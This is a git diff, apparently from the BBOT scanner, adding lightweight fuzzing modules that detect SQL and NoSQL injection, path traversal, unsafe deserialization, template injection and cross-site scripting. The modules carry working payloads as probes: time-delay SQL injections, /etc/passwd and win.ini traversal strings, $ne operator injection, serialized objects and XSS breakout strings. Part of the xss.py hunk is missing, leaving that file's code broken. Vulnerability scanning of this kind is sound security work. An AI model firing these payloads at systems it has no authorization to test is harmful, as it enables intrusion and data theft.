== mutate_probe[1]): + 
context = f"Lightfuzz Cryptographic Probe Submodule detected a parameter ({self.event.data['name']}) that is a likely a hash, which is connected to another parameter {additional_param_name})" + self.results.append( + { + "type": "FINDING", + "description": f"Possible {self.event.data['type']} parameter with {hash_instance.name.upper()} Hash as value. {self.metadata()}, linked to additional parameter [{additional_param_name}]", + "context": context, + } + ) diff --git a/bbot/modules/lightfuzz/submodules/nosqli.py b/bbot/modules/lightfuzz/submodules/nosqli.py new file mode 100644 index 0000000000..3bbea687a8 --- /dev/null +++ b/bbot/modules/lightfuzz/submodules/nosqli.py @@ -0,0 +1,169 @@ +from .base import BaseLightfuzz +from bbot.errors import HttpCompareError +import urllib.parse + + +class nosqli(BaseLightfuzz): + """ + NoSQLi Lightfuzz module + """ + + friendly_name = "NoSQL Injection" + + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + probe_value = self.incoming_probe_value(populate_empty=True) + quote_probe_baseline = None + try: + quote_probe_baseline = self.compare_baseline( + self.event.data["type"], probe_value, cookies, additional_params_populate_empty=True + ) + except HttpCompareError as e: + self.verbose(f"Encountered HttpCompareError Sending Compare Baseline: {e}") + + if quote_probe_baseline: + try: + # send the with a single quote, and then another with an escaped single quote + ( + single_quote_comparison, + single_quote_diff_reasons, + single_quote_reflection, + single_quote_response, + ) = await self.compare_probe( + quote_probe_baseline, + self.event.data["type"], + f"{probe_value}'", + cookies, + additional_params_populate_empty=True, + ) + ( + escaped_single_quote_comparison, + escaped_single_quote_diff_reasons, + escaped_single_quote_reflection, + escaped_single_quote_response, + ) = await self.compare_probe( + quote_probe_baseline, + self.event.data["type"], + rf"{probe_value}\'", + cookies, + additional_params_populate_empty=True, + ) + if not single_quote_comparison and single_quote_response and escaped_single_quote_response: + # if the single quote probe changed the code or body, and the escaped single quote probe did not cause the same change, injection is possible + if ("code" in single_quote_diff_reasons or "body" in single_quote_diff_reasons) and ( + single_quote_diff_reasons != escaped_single_quote_diff_reasons + ): + self.verbose( + "Initial heuristic indicates possible NoSQL Injection, sending confirmation probes" + ) + confirm_baseline = self.compare_baseline( + self.event.data["type"], + urllib.parse.quote(f"{probe_value}' && 0 && 'x", safe=""), + cookies, + additional_params_populate_empty=True, + skip_urlencoding=True, + ) + ( + confirmation_probe_false_comparison, + confirmation_probe_false_diff_reasons, + confirmation_probe_false_reflection, + confirmation_probe_false_response, + ) = await self.compare_probe( + confirm_baseline, + self.event.data["type"], + urllib.parse.quote(f"{probe_value}' && 1 && 'x", safe=""), + cookies, + additional_params_populate_empty=True, + skip_urlencoding=True, + ) + if confirmation_probe_false_response: + if not confirmation_probe_false_comparison and confirmation_probe_false_diff_reasons != [ + "header" + ]: + ( + final_confirm_comparison, + final_confirm_diff_reasons, + final_confirm_reflection, + final_confirm_response, + ) = await self.compare_probe( + confirm_baseline, + self.event.data["type"], + urllib.parse.quote(f"{probe_value}' && 0 && 'x", safe=""), + cookies, + 
additional_params_populate_empty=True, + skip_urlencoding=True, + ) + + if final_confirm_response and final_confirm_comparison: + self.results.append( + { + "type": "FINDING", + "description": f"Possible NoSQL Injection. {self.metadata()} Detection Method: [Quote/Escaped Quote + Conditional Affect] Differences: [{'.'.join(confirmation_probe_false_diff_reasons)}]", + } + ) + else: + self.verbose( + "Aborted reporting Possible NoSQL Injection, due to unstable/inconsistent responses" + ) + + except HttpCompareError as e: + self.verbose(f"Encountered HttpCompareError Sending Compare Probe: {e}") + + # Comparison operator injection + if self.event.data["type"] in ["POSTPARAM", "GETPARAM"]: + nosqli_negation_baseline = None + + try: + nosqli_negation_baseline = self.compare_baseline( + self.event.data["type"], + f"{probe_value}'", + cookies, + additional_params_populate_empty=True, + parameter_name_suffix="[$eq]", + parameter_name_suffix_additional_params="[$eq]", + ) + except HttpCompareError as e: + self.verbose(f"Encountered HttpCompareError Sending Compare Baseline: {e}") + + if nosqli_negation_baseline: + try: + ( + nosqli_negate_comparison, + nosqli_negate_diff_reasons, + nosqli_negate_reflection, + nosqli_negate_response, + ) = await self.compare_probe( + nosqli_negation_baseline, + self.event.data["type"], + f"{probe_value}'", + cookies, + additional_params_populate_empty=True, + parameter_name_suffix="[$ne]", + parameter_name_suffix_additional_params="[$ne]", + ) + if nosqli_negate_response: + if not nosqli_negate_comparison and nosqli_negate_diff_reasons != ["header"]: + # If we are about to report a finding, rule out a false positive from unstable URL by sending another probe with the baseline values, and ensure those dont also come back as different + ( + nosqli_negate_comfirm_comparison, + nosqli_negate_confirm_diff_reasons, + nosqli_negate_confirm_reflection, + nosqli_negate_confirm_response, + ) = await self.compare_probe( + nosqli_negation_baseline, + self.event.data["type"], + f"{probe_value}'", + cookies, + additional_params_populate_empty=True, + parameter_name_suffix="[$eq]", + parameter_name_suffix_additional_params="[$eq]", + ) + if nosqli_negate_comfirm_comparison: + self.results.append( + { + "type": "FINDING", + "description": f"Possible NoSQL Injection. 
{self.metadata()} Detection Method: [Parameter Name Operator Injection - Negation ([$ne])] Differences: [{'.'.join(nosqli_negate_diff_reasons)}]", + } + ) + except HttpCompareError as e: + self.verbose(f"Encountered HttpCompareError Sending Compare Probe: {e}") diff --git a/bbot/modules/lightfuzz/submodules/path.py b/bbot/modules/lightfuzz/submodules/path.py new file mode 100644 index 0000000000..75c9d0d28b --- /dev/null +++ b/bbot/modules/lightfuzz/submodules/path.py @@ -0,0 +1,136 @@ +from .base import BaseLightfuzz +from bbot.errors import HttpCompareError + +import re +from urllib.parse import quote + + +class path(BaseLightfuzz): + friendly_name = "Path Traversal" + + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + probe_value = self.incoming_probe_value(populate_empty=False) + if not probe_value: + self.debug( + f"Path Traversal detection requires original value, aborting [{self.event.data['type']}] [{self.event.data['name']}]" + ) + return + + # Single dot traversal tolerance test + path_techniques = { + "single-dot traversal tolerance (no-encoding)": { + "singledot_payload": f"./a/../{probe_value}", + "doubledot_payload": f"../a/../{probe_value}", + }, + "single-dot traversal tolerance (no-encoding, leading slash)": { + "singledot_payload": f"/./a/../{probe_value}", + "doubledot_payload": f"/../a/../{probe_value}", + }, + "single-dot traversal tolerance (url-encoding)": { + "singledot_payload": quote(f"./a/../{probe_value}".encode(), safe=""), + "doubledot_payload": quote(f"../a/../{probe_value}".encode(), safe=""), + }, + "single-dot traversal tolerance (url-encoding, leading slash)": { + "singledot_payload": quote(f"/./a/../{probe_value}".encode(), safe=""), + "doubledot_payload": quote(f"/../a/../{probe_value}".encode(), safe=""), + }, + "single-dot traversal tolerance (non-recursive stripping)": { + "singledot_payload": f"...//a/....//{probe_value}", + "doubledot_payload": f"....//a/....//{probe_value}", + }, + "single-dot traversal tolerance (non-recursive stripping, leading slash)": { + "singledot_payload": f"/...//a/....//{probe_value}", + "doubledot_payload": f"/....//a/....//{probe_value}", + }, + "single-dot traversal tolerance (double url-encoding)": { + "singledot_payload": f".%252fa%252f..%252f{probe_value}", + "doubledot_payload": f"..%252fa%252f..%252f{probe_value}", + }, + "single-dot traversal tolerance (double url-encoding, leading slash)": { + "singledot_payload": f"%252f.%252fa%252f..%252f{probe_value}", + "doubledot_payload": f"%252f..%252fa%252f..%252f{probe_value}", + }, + } + + linux_path_regex = re.match(r"\/(?:\w+\/?)+\.\w+", probe_value) + if linux_path_regex is not None: + original_path_only = "/".join(probe_value.split("/")[:-1]) + original_filename_only = probe_value.split("/")[-1] + # Some servers validate the start of the path, so we construct our payload with the original path and filename + path_techniques["single-dot traversal tolerance (start of path validation)"] = { + "singledot_payload": f"{original_path_only}/./{original_filename_only}", + "doubledot_payload": f"{original_path_only}/../{original_filename_only}", + } + + for path_technique, payloads in path_techniques.items(): + iterations = 5 # one failed detection is tolerated, as long as its not the first run + confirmations = 0 + while iterations > 0: + try: + http_compare = self.compare_baseline( + self.event.data["type"], probe_value, cookies, skip_urlencoding=True + ) + singledot_probe = await self.compare_probe( + http_compare, + self.event.data["type"], 
+ payloads["singledot_payload"], + cookies, + skip_urlencoding=True, + ) + doubledot_probe = await self.compare_probe( + http_compare, + self.event.data["type"], + payloads["doubledot_payload"], + cookies, + skip_urlencoding=True, + ) + # if singledot_probe[0] is true, the response is the same as the baseline. This indicates adding a single dot did not break the functionality + # next, if doubledot_probe[0] is false, the response is different from the baseline. This further indicates that a real path is being manipulated + # if doubledot_probe[3] is not None, the response is not empty. + # if doubledot_probe[1] is not ["header"], the response is not JUST a header change. + # "The requested URL was rejected" is a very common WAF error message which appears on 200 OK response, confusing detections + if ( + singledot_probe[0] is True + and doubledot_probe[0] is False + and doubledot_probe[3] is not None + and doubledot_probe[1] != ["header"] + and "The requested URL was rejected" not in doubledot_probe[3].text + ): + confirmations += 1 + self.verbose(f"Got possible Path Traversal detection: [{str(confirmations)}] Confirmations") + # only report if we have 3 confirmations + if confirmations > 3: + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Path Traversal. {self.metadata()} Detection Method: [{path_technique}]", + } + ) + # no need to report both techniques if they both work + break + except HttpCompareError as e: + iterations -= 1 + self.debug(e) + continue + + iterations -= 1 + if confirmations == 0: + break + + # Absolute path test, covering Windows and Linux + absolute_paths = { + r"c:\\windows\\win.ini": "; for 16-bit app support", + "/etc/passwd": "daemon:x:", + "../../../../../etc/passwd%00.png": "daemon:x:", + } + + for path, trigger in absolute_paths.items(): + r = await self.standard_probe(self.event.data["type"], cookies, path, skip_urlencoding=True) + if r and trigger in r.text: + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Path Traversal. {self.metadata()} Detection Method: [Absolute Path: {path}]", + } + ) diff --git a/bbot/modules/lightfuzz/submodules/serial.py b/bbot/modules/lightfuzz/submodules/serial.py new file mode 100644 index 0000000000..5fb6cd7aaa --- /dev/null +++ b/bbot/modules/lightfuzz/submodules/serial.py @@ -0,0 +1,168 @@ +from .base import BaseLightfuzz +from bbot.errors import HttpCompareError + + +class serial(BaseLightfuzz): + """ + This module finds places where serialized objects are being deserialized. + + It tests two possible deserialization cases. It starts by performing a baseline with a specially-crafted non-serialized payload, which successfully decodes via both base64 and hex. This is designed to coax out an error that's not decoding-specific. + + After performing the baseline (Which by design may contain an error), we check for two possible deserialization cases: + - Replacing the payload with a serialized object changes the status code to 200 (minus some string signatures to help prevent false positives) + - If the first case doesn't match, we check for a telltale error string like "java.io.optionaldataexception" in the response. + - Because of the possibility for false positives, we only consider responses that are 500s 200s where the body changed. 
+ """ + + friendly_name = "Unsafe Deserialization" + + def is_possibly_serialized(self, value): + # Use the is_base64 method from BaseLightfuzz via self + if self.is_base64(value): + return True + + # Use the is_hex method from BaseLightfuzz via self + if self.is_hex(value): + return True + + # List of common PHP serialized data prefixes + php_serialized_prefixes = [ + "a:", # Array + "O:", # Object + "s:", # String + "i:", # Integer + "d:", # Double + "b:", # Boolean + "N;", # Null + ] + + # Check if the value starts with any of the PHP serialized prefixes + if any(value.startswith(prefix) for prefix in php_serialized_prefixes): + return True + return False + + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + control_payload_hex = "f56124208220432ec767646acd2e6c6bc9622a62c5656f2eeb616e2f" + control_payload_base64 = "4Wt5fYx5Y3rELn5myS5oa996Ji7IZ28uwGdha4x6YmuMfG992CA=" + control_payload_php_raw = "z:0:{}" + # These payloads are benign, no-op, or otherwise harmless + # minimally sized valid serialized objects for their given language/platform + base64_serialization_payloads = { + "php_base64": "YTowOnt9", + "java_base64": "rO0ABXNyABFqYXZhLmxhbmcuQm9vbGVhbs0gcoDVnPruAgABWgAFdmFsdWV4cAA=", + "java_base64_string_error": "rO0ABXQABHRlc3Q=", + "java_base64_OptionalDataException": "rO0ABXcEAAAAAAEAAAABc3IAEGphdmEudXRpbC5IYXNoTWFwAAAAAAAAAAECAAJMAARrZXkxYgABAAAAAAAAAAJ4cHcBAAAAB3QABHRlc3Q=", + "dotnet_base64": "AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==", + "ruby_base64": "BAh7BjoKbE1FAAVJsg==", + } + + hex_serialization_payloads = { + "java_hex": "ACED00057372000E6A6176612E6C616E672E426F6F6C65616ECD207EC0D59CF6EE02000157000576616C7565787000", + "java_hex_OptionalDataException": "ACED0005737200106A6176612E7574696C2E486173684D617000000000000000012000014C00046B6579317A00010000000000000278707000000774000474657374", + "dotnet_hex": "0001000000ffffffff01000000000000000601000000076775737461766f0b", + } + + php_raw_serialization_payloads = { + "php_raw": "a:0:{}", + } + + serialization_errors = [ + "invalid user", + "cannot cast java.lang.string", + "dump format error", + "java.io.optionaldataexception", + ] + + general_errors = [ + "Internal Error", + "Internal Server Error", + "The requested URL was rejected", + ] + + probe_value = self.incoming_probe_value(populate_empty=False) + if probe_value: + if self.is_possibly_serialized(probe_value): + self.debug( + f"Existing value is not ruled out for being a serialized object, proceeding [{self.event.data['type']}] [{self.event.data['name']}]" + ) + else: + self.debug( + f"The Serialization Submodule only operates when there is no original value, or when the original value could potentially be a serialized object, aborting [{self.event.data['type']}] [{self.event.data['name']}]" + ) + return + + try: + http_compare_hex = self.compare_baseline(self.event.data["type"], control_payload_hex, cookies) + http_compare_base64 = self.compare_baseline(self.event.data["type"], control_payload_base64, cookies) + http_compare_php_raw = self.compare_baseline(self.event.data["type"], control_payload_php_raw, cookies) + except HttpCompareError as e: + self.debug(f"HttpCompareError encountered: {e}") + return + + # Proceed with payload probes + for payload_set, payload_baseline in [ + (base64_serialization_payloads, http_compare_base64), + (hex_serialization_payloads, http_compare_hex), + (php_raw_serialization_payloads, http_compare_php_raw), + ]: + for type, payload in payload_set.items(): + try: + matches_baseline, diff_reasons, 
reflection, response = await self.compare_probe( + payload_baseline, self.event.data["type"], payload, cookies + ) + except HttpCompareError as e: + self.debug(f"HttpCompareError encountered: {e}") + continue + + if matches_baseline: + self.debug(f"Payload {type} matches baseline, skipping") + continue + + self.debug(f"Probe result for {type}: {response}") + + status_code = getattr(response, "status_code", 0) + if status_code == 0: + continue + + if diff_reasons == ["header"]: + self.debug(f"Only header diffs found for {type}, skipping") + continue + + if status_code not in (200, 500): + self.debug(f"Status code {status_code} not in (200, 500), skipping") + continue + + # if the status code changed to 200, and the response doesn't match our general error exclusions, we have a finding + self.debug(f"Potential finding detected for {type}, needs confirmation") + if ( + status_code == 200 + and "code" in diff_reasons + and not any( + error in response.text for error in general_errors + ) # ensure the 200 is not actually an error + ): + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Unsafe Deserialization. {self.metadata()} Technique: [Error Resolution] Serialization Payload: [{type}]", + } + ) + # if the first case doesn't match, we check for a telltale error string like "java.io.optionaldataexception" in the response. + # but only if the response is a 500, or a 200 with a body diff + elif status_code == 500 or (status_code == 200 and diff_reasons == ["body"]): + self.debug(f"500 status code or body match for {type}") + for serialization_error in serialization_errors: + # check for the error string, but also ensure the error string isn't just always present in the response + if ( + serialization_error in response.text.lower() + and serialization_error not in payload_baseline.baseline.text.lower() + ): + self.debug(f"Error string '{serialization_error}' found in response for {type}") + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Unsafe Deserialization. {self.metadata()} Technique: [Differential Error Analysis] Error-String: [{serialization_error}] Payload: [{type}]", + } + ) + break diff --git a/bbot/modules/lightfuzz/submodules/sqli.py b/bbot/modules/lightfuzz/submodules/sqli.py new file mode 100644 index 0000000000..8477179b74 --- /dev/null +++ b/bbot/modules/lightfuzz/submodules/sqli.py @@ -0,0 +1,171 @@ +from .base import BaseLightfuzz +from bbot.errors import HttpCompareError + +import statistics + + +class sqli(BaseLightfuzz): + friendly_name = "SQL Injection" + + expected_delay = 5 + # These are common error strings that strongly indicate SQL injection + sqli_error_strings = [ + "Unterminated string literal", + "Failed to parse string literal", + "error in your SQL syntax", + "syntax error at or near", + "Unknown column", + "unterminated quoted string", + "Unclosed quotation mark", + "Incorrect syntax near", + "SQL command not properly ended", + "string not properly terminated", + ] + + def evaluate_delay(self, mean_baseline, measured_delay): + """ + Evaluates if a measured delay falls within an expected range, indicating potential SQL injection. + + Parameters: + - mean_baseline (float): The average baseline delay measured from non-injected requests. + - measured_delay (float): The delay measured from a potentially injected request. + + Returns: + - bool: True if the measured delay is within the expected range or exactly twice the expected delay, otherwise False. 
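+
+ For example, with expected_delay=5 and the 1.5-second margin used below: given a mean_baseline of 0.4, measured delays between 3.9 and 6.9 seconds (or between 8.9 and 11.9 seconds, the doubled-execution case) return True; anything else returns False.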
+
+ The function checks if the measured delay is within a margin of the expected delay or twice the expected delay,
+ accounting for cases where the injected statement might be executed twice.
+ """
+ margin = 1.5
+ if (
+ mean_baseline + self.expected_delay - margin
+ <= measured_delay
+ <= mean_baseline + self.expected_delay + margin
+ ):
+ return True
+ # check for exactly twice the delay, in case the statement gets placed in the query twice (a common occurrence)
+ elif (
+ mean_baseline + (self.expected_delay * 2) - margin
+ <= measured_delay
+ <= mean_baseline + (self.expected_delay * 2) + margin
+ ):
+ return True
+ else:
+ return False
+
+ async def fuzz(self):
+ cookies = self.event.data.get("assigned_cookies", {})
+ probe_value = self.incoming_probe_value(populate_empty=True)
+ http_compare = self.compare_baseline(
+ self.event.data["type"], probe_value, cookies, additional_params_populate_empty=True
+ )
+
+ try:
+ # send the probe with a single quote, and then another with two single quotes
+ single_quote = await self.compare_probe(
+ http_compare,
+ self.event.data["type"],
+ f"{probe_value}'",
+ cookies,
+ additional_params_populate_empty=True,
+ )
+ double_single_quote = await self.compare_probe(
+ http_compare,
+ self.event.data["type"],
+ f"{probe_value}''",
+ cookies,
+ additional_params_populate_empty=True,
+ )
+ # if the single quote probe response is different from the baseline
+ if single_quote[0] is False:
+ # check for common SQL error strings in the response
+ for sqli_error_string in self.sqli_error_strings:
+ if sqli_error_string.lower() in single_quote[3].text.lower():
+ self.results.append(
+ {
+ "type": "FINDING",
+ "description": f"Possible SQL Injection. {self.metadata()} Detection Method: [SQL Error Detection] Detected String: [{sqli_error_string}]",
+ }
+ )
+ break
+ # if both probes were successful (and had a response)
+ if single_quote[3] and double_single_quote[3]:
+ # Ensure none of the status codes are "429"
+ if (
+ single_quote[3].status_code != 429
+ and double_single_quote[3].status_code != 429
+ and http_compare.baseline.status_code != 429
+ ): # prevent false positives from rate limiting
+ # if the code changed in the single quote probe, and the code is NOT the same between that and the double single quote probe, SQL injection is indicated
+ if "code" in single_quote[1] and (
+ single_quote[3].status_code != double_single_quote[3].status_code
+ ):
+ self.results.append(
+ {
+ "type": "FINDING",
+ "description": f"Possible SQL Injection. {self.metadata()} Detection Method: [Single Quote/Two Single Quote, Code Change ({http_compare.baseline.status_code}->{single_quote[3].status_code}->{double_single_quote[3].status_code})]",
+ }
+ )
+ else:
+ self.debug("Failed to get responses for both single_quote and double_single_quote")
+ except HttpCompareError as e:
+ self.verbose(f"Encountered HttpCompareError Sending Compare Probe: {e}")
+
+ # These are common SQL injection payloads for inducing an intentional delay across several different SQL database types
+ standard_probe_strings = [
+ f"'||pg_sleep({str(self.expected_delay)})--", # postgres
+ f"1' AND (SLEEP({str(self.expected_delay)})) AND '", # mysql
+ f"' AND (SELECT FROM DBMS_LOCK.SLEEP({str(self.expected_delay)})) AND '1'='1", # oracle (not tested)
+ f"; WAITFOR DELAY '00:00:{str(self.expected_delay)}'--", # mssql (not tested)
+ ]
+
+ baseline_1 = await self.standard_probe(
+ self.event.data["type"], cookies, probe_value, additional_params_populate_empty=True
+ )
+ baseline_2 = await self.standard_probe(
+ self.event.data["type"], cookies, probe_value, additional_params_populate_empty=True
+ )
+
+ # get a baseline from two different probes. We will average them to establish a mean baseline
+ if baseline_1 and baseline_2:
+ baseline_1_delay = baseline_1.elapsed.total_seconds()
+ baseline_2_delay = baseline_2.elapsed.total_seconds()
+ mean_baseline = statistics.mean([baseline_1_delay, baseline_2_delay])
+
+ for p in standard_probe_strings:
+ confirmations = 0
+ for i in range(0, 3):
+ # send the probe 3 times, and check if the delay is within the detection threshold
+ r = await self.standard_probe(
+ self.event.data["type"],
+ cookies,
+ f"{probe_value}{p}",
+ additional_params_populate_empty=True,
+ timeout=20,
+ )
+ if not r:
+ self.debug("delay measure request failed")
+ break
+
+ d = r.elapsed.total_seconds()
+ self.debug(f"measured delay: {str(d)}")
+ if self.evaluate_delay(
+ mean_baseline, d
+ ): # decide if the delay is within the detection threshold and constitutes a successful sleep execution
+ confirmations += 1
+ self.debug(
+ f"{self.event.data['url']}:{self.event.data['name']}:{self.event.data['type']} Increasing confirmations, now: {str(confirmations)} "
+ )
+ else:
+ break
+
+ if confirmations == 3:
+ self.results.append(
+ {
+ "type": "FINDING",
+ "description": f"Possible Blind SQL Injection. {self.metadata()} Detection Method: [Delay Probe ({p})]",
+ }
+ )
+
+ else:
+ self.debug("Could not get baseline for time-delay tests")
diff --git a/bbot/modules/lightfuzz/submodules/ssti.py b/bbot/modules/lightfuzz/submodules/ssti.py
new file mode 100644
index 0000000000..f28710aa4e
--- /dev/null
+++ b/bbot/modules/lightfuzz/submodules/ssti.py
@@ -0,0 +1,30 @@
+from .base import BaseLightfuzz
+
+
+class ssti(BaseLightfuzz):
+ friendly_name = "Server-side Template Injection"
+
+ async def fuzz(self):
+ cookies = self.event.data.get("assigned_cookies", {})
+ # These are common SSTI payloads, each attempting to trigger an integer multiplication which would produce an expected value
+ ssti_probes = [
+ "<%25%3d%201337*1337%20%25>",
+ "<%= 1337*1337 %>",
+ "${1337*1337}",
+ "%24%7b1337*1337%7d",
+ "1,787{{z}},569",
+ ]
+ for probe_value in ssti_probes:
+ r = await self.standard_probe(
+ self.event.data["type"], cookies, probe_value, allow_redirects=True, skip_urlencoding=True
+ )
+
+ # look for the expected value in the response
+ if r and ("1787569" in r.text or "1,787,569" in r.text):
+ self.results.append(
+ {
+ "type": "FINDING",
+ "description": f"POSSIBLE Server-side Template Injection. {self.metadata()} Detection Method: [Integer Multiplication] Payload: [{probe_value}]",
+ }
+ )
+ break
diff --git a/bbot/modules/lightfuzz/submodules/xss.py b/bbot/modules/lightfuzz/submodules/xss.py
new file mode 100644
index 0000000000..965121daf3
--- /dev/null
+++ b/bbot/modules/lightfuzz/submodules/xss.py
@@ -0,0 +1,168 @@
+from .base import BaseLightfuzz
+
+import regex as re
+
+
+class xss(BaseLightfuzz):
+ friendly_name = "Cross-Site Scripting"
+
+ async def determine_context(self, cookies, html, random_string):
+ """
+ Determines the context of the random string in the HTML response.
+ With XSS, the context is the part of the page where the injection occurs, which determines what payloads might be successful
+
+ https://portswigger.net/web-security/cross-site-scripting/contexts
+ """
+ between_tags = False
+ in_tag_attribute = False
+ in_javascript = False
+
+ between_tags_regex = re.compile(
+ rf"<(\/?\w+)[^>]*>.*?{random_string}.*?<\/?\w+>"
+ ) # The between tags context is when the injection occurs between HTML tags
+ in_tag_attribute_regex = re.compile(
+ rf'<(\w+)\s+[^>]*?(\w+)="([^"]*?{random_string}[^"]*?)"[^>]*>'
+ ) # The in tag attribute context is when the injection occurs in an attribute of an HTML tag
+ in_javascript_regex = re.compile(
+ rf"<script[^>]*>[^<]*(?:<(?!\/script>)[^<]*)*{random_string}[^<]*(?:<(?!\/script>)[^<]*)*<\/script>"
+ ) # The in javascript context is when the injection occurs within a <script> tag
+ result = await self.check_probe(
+ cookies, in_javascript_probe, in_javascript_probe, "In Javascript"
+ ) # After reflection in the HTTP response, did the script tags survive without url-encoding or other sanitization/escaping?
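+ # Illustrative sketch of the escape-the-escape technique applied below (single-quote context):
+ #   a normal breakout probe  a';zzzzz(...)  gets neutralized by server-side escaping into  a\';zzzzz(...),
+ #   but  a\';zzzzz(...)\  comes back as  a\\';zzzzz(...)\\  -- the injected backslash escapes the escape
+ #   character, so the quote terminates the string and zzzzz(...) runs as javascript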
+ if result is False: + # To attempt this technique, we need to determine the type of quote we are within + quote_context = await self.determine_javascript_quote_context( + random_string, reflection_probe_result.text + ) + + # Skip the test if the context is outside + if quote_context == "outside": + return + + # Update probes based on the quote context + if quote_context == "single": + in_javascript_escape_probe = rf"a\';zzzzz({random_string})\\" + in_javascript_escape_match = rf"a\\';zzzzz({random_string})\\" + elif quote_context == "double": + in_javascript_escape_probe = rf"a\";zzzzz({random_string})\\" + in_javascript_escape_match = rf'a\\";zzzzz({random_string})\\' + + await self.check_probe( + cookies, + in_javascript_escape_probe, + in_javascript_escape_match, + f"In Javascript (escaping the escape character, {quote_context} quote)", + ) diff --git a/bbot/modules/deadly/nuclei.py b/bbot/modules/nuclei.py similarity index 99% rename from bbot/modules/deadly/nuclei.py rename to bbot/modules/nuclei.py index b973c714bc..440fa580da 100644 --- a/bbot/modules/deadly/nuclei.py +++ b/bbot/modules/nuclei.py @@ -7,7 +7,7 @@ class nuclei(BaseModule): watched_events = ["URL"] produced_events = ["FINDING", "VULNERABILITY", "TECHNOLOGY"] - flags = ["active", "aggressive"] + flags = ["active", "aggressive", "deadly"] meta = { "description": "Fast and customisable vulnerability scanner", "created_date": "2022-03-12", diff --git a/bbot/modules/paramminer_headers.py b/bbot/modules/paramminer_headers.py index cd3648ada0..e3b3e4aa3f 100644 --- a/bbot/modules/paramminer_headers.py +++ b/bbot/modules/paramminer_headers.py @@ -52,6 +52,7 @@ class paramminer_headers(BaseModule): "javascript", "keep-alive", "label", + "max-forwards", "negotiate", "proxy", "range", @@ -148,6 +149,7 @@ async def process_results(self, event, results): "type": paramtype, "description": description, "name": result, + "original_value": None, }, "WEB_PARAMETER", event, diff --git a/bbot/modules/reflected_parameters.py b/bbot/modules/reflected_parameters.py new file mode 100644 index 0000000000..f7e17e57e6 --- /dev/null +++ b/bbot/modules/reflected_parameters.py @@ -0,0 +1,80 @@ +from bbot.modules.base import BaseModule + + +class reflected_parameters(BaseModule): + watched_events = ["WEB_PARAMETER"] + produced_events = ["FINDING"] + flags = ["active", "safe", "web-thorough"] + meta = { + "description": "Highlight parameters that reflect their contents in response body", + "author": "@liquidsec", + "created_date": "2024-10-29", + } + + async def handle_event(self, event): + url = event.data.get("url") + reflection_detected = await self.detect_reflection(event, url) + + if reflection_detected: + param_type = event.data.get("type", "UNKNOWN") + description = ( + f"[{param_type}] Parameter value reflected in response body. 
Name: [{event.data['name']}] " + f"Source Module: [{str(event.module)}]" + ) + if event.data.get("original_value"): + description += ( + f" Original Value: [{self.helpers.truncate_string(str(event.data['original_value']), 200)}]" + ) + data = {"host": str(event.host), "description": description, "url": url} + await self.emit_event(data, "FINDING", event) + + async def detect_reflection(self, event, url): + """Detects reflection by sending a probe with a random value and a canary parameter.""" + probe_parameter_name = event.data["name"] + probe_parameter_value = self.helpers.rand_string() + canary_parameter_value = self.helpers.rand_string() + probe_response = await self.send_probe_with_canary( + event, + probe_parameter_name, + probe_parameter_value, + canary_parameter_value, + cookies=event.data.get("assigned_cookies", {}), + timeout=10, + ) + + # Check if the probe parameter value is reflected AND the canary is not + if probe_response: + response_text = probe_response.text + reflection_result = probe_parameter_value in response_text and canary_parameter_value not in response_text + return reflection_result + return False + + async def send_probe_with_canary(self, event, parameter_name, parameter_value, canary_value, cookies, timeout=10): + method = "GET" + url = event.data["url"] + headers = {} + data = None + json_data = None + params = {parameter_name: parameter_value, "c4n4ry": canary_value} + + if event.data["type"] == "GETPARAM": + url = f"{url}?{parameter_name}={parameter_value}&c4n4ry={canary_value}" + elif event.data["type"] == "COOKIE": + cookies.update(params) + elif event.data["type"] == "HEADER": + headers.update(params) + elif event.data["type"] == "POSTPARAM": + method = "POST" + data = params + elif event.data["type"] == "BODYJSON": + method = "POST" + json_data = params + + self.debug( + f"Sending {method} request to {url} with headers: {headers}, cookies: {cookies}, data: {data}, json: {json_data}" + ) + + response = await self.helpers.request( + method=method, url=url, headers=headers, cookies=cookies, data=data, json=json_data, timeout=timeout + ) + return response diff --git a/bbot/modules/deadly/vhost.py b/bbot/modules/vhost.py similarity index 98% rename from bbot/modules/deadly/vhost.py rename to bbot/modules/vhost.py index 29aa5b6438..0c8759f097 100644 --- a/bbot/modules/deadly/vhost.py +++ b/bbot/modules/vhost.py @@ -1,13 +1,13 @@ import base64 from urllib.parse import urlparse -from bbot.modules.deadly.ffuf import ffuf +from bbot.modules.ffuf import ffuf class vhost(ffuf): watched_events = ["URL"] produced_events = ["VHOST", "DNS_NAME"] - flags = ["active", "aggressive", "slow"] + flags = ["active", "aggressive", "slow", "deadly"] meta = {"description": "Fuzz for virtual hosts", "created_date": "2022-05-02", "author": "@liquidsec"} special_vhost_list = ["127.0.0.1", "localhost", "host.docker.internal"] diff --git a/bbot/presets/web/lightfuzz-intense.yml b/bbot/presets/web/lightfuzz-intense.yml new file mode 100644 index 0000000000..7adf876468 --- /dev/null +++ b/bbot/presets/web/lightfuzz-intense.yml @@ -0,0 +1,30 @@ +description: Discover web parameters and lightly fuzz them for vulnerabilities, with more intense discovery techniques + +flags: + - web-paramminer + +modules: + - httpx + - lightfuzz + - robots + - badsecrets + - hunt + - reflected_parameters + - portfilter + +config: + url_querystring_remove: False + url_querystring_collapse: True + modules: + lightfuzz: + force_common_headers: False + enabled_submodules: 
